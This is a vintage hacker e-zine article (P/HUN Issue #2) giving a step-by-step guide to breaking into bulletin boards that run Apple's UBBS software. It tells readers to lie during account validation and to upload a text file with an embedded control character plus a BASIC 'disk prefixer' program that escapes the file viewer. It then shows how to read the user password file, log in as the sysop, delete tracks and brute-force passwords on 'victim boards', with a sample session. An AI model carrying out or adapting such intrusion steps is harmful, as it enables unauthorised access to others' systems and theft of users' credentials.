=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = Volume 1 , P/HUN Issue #2 , Phile #3 of 9 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Defeating Security on Apple's UBBS ---------------------------------- Writen by Evil Mind of CTG Computer Terrorists Guild Introduction ------------- Hello fellow hackers are phreakers, I'm here to tell you all about Apple's UBBS. This is a nice little program that will make any Apple computer with a modem have the ability to be a bbs. It can be on any storage device, from a 5.25 disk, to a chain of hard drives. I doubt any hackers or phreakers are using this program, because everyone (in Apple's world) uses GBBS. So, let's get down to business. For flexability, UBBS has been written in BASIC. For our convience, hackers with a knowledge of universial basic (or better yet, knowledge of Apple BASIC) will have a good time. The only catch is, the control-c (break basic programs) is screened out by a ml routine before it hits basic. But, no need to fear, discussion on hacking it is later. When a sysop first uses a UBBS program, the sysop must run the program SYSGEN.... which is for System Generation, the "Creator Program" for the board. Questions are name of board, sysop's name, bullitin's names, and other things needed before the next program is run: LOGON... which will then put the computer in answer mode. Let's say some guy calls a few days later. The LOGON program will then display a bbs title, then something like "Enter your name or press for NEW." So, this guy does a for new... questions are asked, and then the sysop validates him. Normal procedure like any other bbs program. Hacking it ----------- Once in the system, get access to the eatures section which hopefully has a up/downloading section. If they give a lame excuse of not giving it to you because of an IBM, lie in the validation part, and say you own an Apple. First, upload some text file... like a list of bbs numbers. If the file needs to be validated by the sysop before further access from the public, then it will be hard to hack it out. (Explained later.) Now, at least you have some access... hopefully the u/d ratio is 1:1 or better. So, upload two more files! File #1 -------- This is the most important file in the hacking process. This file should contain the following or simular to it: (=) This is a TEXT file. ------------------------------------------------------------------------------ THIS IS A POEM CAT RAT DOG PAT BY MR. WALTHER ------------------------------------------------------------------------------ File explained: Well, the control D is needed. If you can't enter it from your word processor, then enter "DCAT" and go in with a disk editor and change character D into hex $04, which is a control-d to Apple. Normally, control-d is within programs, used to run disk commands from basic. When viewed, it will catalog the current storage device (hard, 3.5, or 5.25) and will be stuck in a "zombie" mode. Also, when downloading this file, view it, don't use Xmodem. But upload file #2 with it, so you can hack in one call and delete your tracks. File #2 -------- Well, this program is supposed to be basic, but since a lot of hackers I know have IBM's, I'll make it hackable from both Apple and IBM. Make the following TEXT, that's right, text file. ------------------------------------------------------------------------------ 10 ONERR GOTO 1000 20 HOME 30 PRINT "A DISK PREFIXER" 40 PRINT 50 PRINT "

REFIX ATALOG IEW ELETE UN" 60 INPUT A$ 70 IF A$<>"P" OR A$<>"p" THEN 100 80 PRINT "PREFIX WHAT? (RETURN FOR LIST, OR FOLLOW EXAMPLE: /HARD1/BBS" 90 INPUT A$: PRINT CHR$(4);"PREFIX ";A$: GOTO 40 100 IF A$<>"C" OR A$<>"c" THEN 120 110 PRINT CHR$(4);"CATALOG": GOTO 40 120 IF A$<>"D" OR A$<>"d" THEN 150 130 PRINT "DELETE WHAT FILE?" 140 INPUT A$: PRINT CHR$(4);"DELETE ";A$: GOTO 40 150 IF A$<>"R" OR A$<>"r" THEN 180 160 PRINT "RUN WHICH FILE?" 170 INPUT A$: PRINT CHR$(4);"RUN ";A$: GOTO 40 180 IF A$<>"V" AND A$<>"v" THEN PRINT "NOT A COMMAND": GOTO 40 190 PRINT "VIEW WHICH FILE?" 200 INPUT A$: PRINT CHR$(4);"OPEN ";A$: PRINT CHR$(4);"READ ";A$ 210 ONERR GOTO 230 220 INPUT B$: PRINT B$: GOTO 220 230 PRINT CHR$(4);"CLOSE ";A$: ONERR GOTO 1000 240 GOTO 40 1000 PRINT "ERROR!": CALL -1370 ------------------------------------------------------------------------------ Upload the files. When asked about file #2, say it's a TXT file. Now view file #1. It will catalog (or DIR) the disk, and then be in a "zombie" state. This is when the basic thinks the disk is still being read, and is really stuck, for you to enter things. To clear that up, the INPUT command is used both for keyboard input, or in the correct conditions (that UBBS uses), disk input from text files! If you can't see it yet, press a control-D and a disk command. The real intention is to run file #2, which will do the hacking. But, File#2 and File#1 might be in a different directory than the transfer program. Use these commands: (With a control-D before them) CAT to see what is on the disk. Example: ]CAT /HARD1 (PREFIX NAME) PROGRAMS DIR 10-NOV-88 2 PRODOS SYS 06-APR-81 32 BASIC.SYSTEM SYS 07-APR-81 20 BASIC.PROGRAMS BAS 10-NOV-88 5 ML.PROGRAMS BIN 10-NOV-88 7 READ.ME TXT 10-NOV-88 10 In which case, should explore further with a ]PREFIX /HARD1/PROGRAMS ]CAT /HARD1/PROGRAMS LOGON BAS 10-APR-84 54 SYSOP BAS 10-APR-84 34 Once you explore enough to fine your files, do an: ]EXEC file#2 Replace "file#2" with whatever you named the second file. Note: exploring will take a long time, because you might need to find some other things to intrest you, like the logon program (which can be in another directory). When exploring in the zombie state, the computer sometimes zaps out back into normal running mode. Re-download and start where you left off. Then it'll go: A DISK PREFIXER

REFIX ATALOG ELETE IEW UN ? Then enter the desired one, in this case, "P" and press enter. Here's how to work them: Examples: from basic ]PREFIX /HARD1/FILES (to get to the diectory /hard1/files) ]PREFIX /HARD1/ (to get back to /hard1) ]PREFIX (tells you what the current prefix is) ]CATALOG (DIR a disk for you) ]RUN LOGON (Go back to LOGON program) View is a different thing, and can't be done from basic. In this case, choose "V" for view, (beforehand, find the userinfo file, a text file.) And when it goes: VIEW WHICH FILE? ? type in a pathname.... example: VIEW WHICH FILE? ?/HARD1/BBS/USERINFO.DATA and it'll show the passwords. Explore! There are a lot of things to do. One last word before you finish, the sysop is 001, find his password, log in as him, then make all your accounts from there (because he validates and creates accounts.) The form for UBBS passwords are: NNNCCCC where N is a number, and C is a character. example: 001SYSOP. Also, 001SYSOP is the default password? (I'm not sure, but I think it is.) Try it on a new board and see if the sysop didn't change it yet. So if your victim board doesn't have the requirements, just use a password scanner and try out 001AAAA 001AAAB and all, and eventually you can get it in a matter of weeks. (No lowercase or control characters are accepted by UBBS.) All in a nutshell, here's another example: ------------------------------------------------------------------------------ Welcome to a UBBS system. Enter name or press return for new users XXXXXXX checking password. Hello Mr. Bill, today is 00/00/00 news for today: This is a new board and hope ya enjoy it, Your sysop, Tom Hacket. No Email waiting Email>Quit Main level: B/A/G/J/N/F/Q/Help >Features loading xfer, please wait... Xfer command> Upload choose protocol: X>modem T>ext Xmodem (upload files) 70 blocks recieved.... Information: What is file#1's type: TXT What is file#2's type: TXT Thank you. Xfer command> Download Download what file? TEST.UPLOAD (file#1) THIS IS A POEM /HARD1/ONLINE CALLER.LOG 06 TXT USER.INFO 65 TXT LOGON 45 BAS SYSGEN 65 BAS TEST.UPLOAD 02 TXT PREFIXER 03 TXT LEECHES 02 TXT (Zombie state) (control-D)EXEC PREFIXER(return) A DISK PREFIXER ATALOG IEW UN ELETE

REFIX ?B NOT A COMMAND! ATALOG IEW UN ELETE

REFIX ?V VIEW WHICH FILE? ?USER.INFO (list of passwords) ATALOG IEW UN ELETE

REFIX ?R RUN WHICH FILE? ?LOGON (Automatically hangs up, you re-call, then log in as sysop, and make another account with good access.) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= DOWNLOADED FROM P-80 SYSTEMS 304-744-2253 Downloaded From P-80 International Information Systems 304-744-2253 12yrs+